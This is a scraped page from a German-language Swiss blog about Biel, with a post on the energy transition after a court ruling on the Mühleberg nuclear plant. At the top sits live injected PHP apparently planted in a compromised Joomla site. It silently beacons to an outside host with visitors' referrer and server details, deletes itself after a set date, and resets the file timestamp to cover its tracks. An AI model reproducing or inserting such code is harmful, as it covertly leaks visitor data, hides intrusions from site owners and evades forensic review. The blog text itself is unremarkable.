check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732117){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php"); } Mybiel Blog
Français

Über die Stadt Biel


Mybiel
on Google+

Mybiel Blog

News zu dieser Seite und zum Geschehen in Biel

Die Energiewende als Chance für Biel

Mobicat ein Symbol für die Energiestadt BielAm 7.3.2012 gab das Verwaltungsgericht ein sehr wichtiges Zeichen für die Zukunft der Energieversorgung der Schweiz. Indem dem Kernkraftwerk Mühleberg die zeitlich uneingeschränkte Betriebsbewilligung entzogen wurde, ist die träge politische Landschaft durchgewühlt worden. Plötzlich fehlt die Zeit um gross zu debattieren wie der Weg zur Energiewende vollzogen wird. Denn nicht zuletzt nach Fukoshima ist dieser Weg der einzig begehbare.

 

Eine Änderung der Denkweise ist nötig

Das grosse Problem in dieser Debatte ist, dass wir und die Politik noch immer von einer alten Denkweise geprägt sind. Wir glauben, dass es eine ähnliche Infrastruktur braucht wie bisher mit grossen Kraftwerken und Verteilernetzen, dass diese Energiewende das Resultat ist von einem Ersatz des bestehenden Kraftwerkparks durch neue Kraftwerke welche auf der Basis von erneuerbaren Energieressourcen funktionieren. Mit dieser Sichtweise kommt man leider nicht voran. Bei jedem neuen Windrad, dass im Jura aufgestellt wird gibt es eine Welle der Entrüstung unter der Bevölkerung. Jeder will erneuerbare Energien aber bitte nicht vor der eigenen Haustür.

Weiterlesen...

Weitere Beiträge...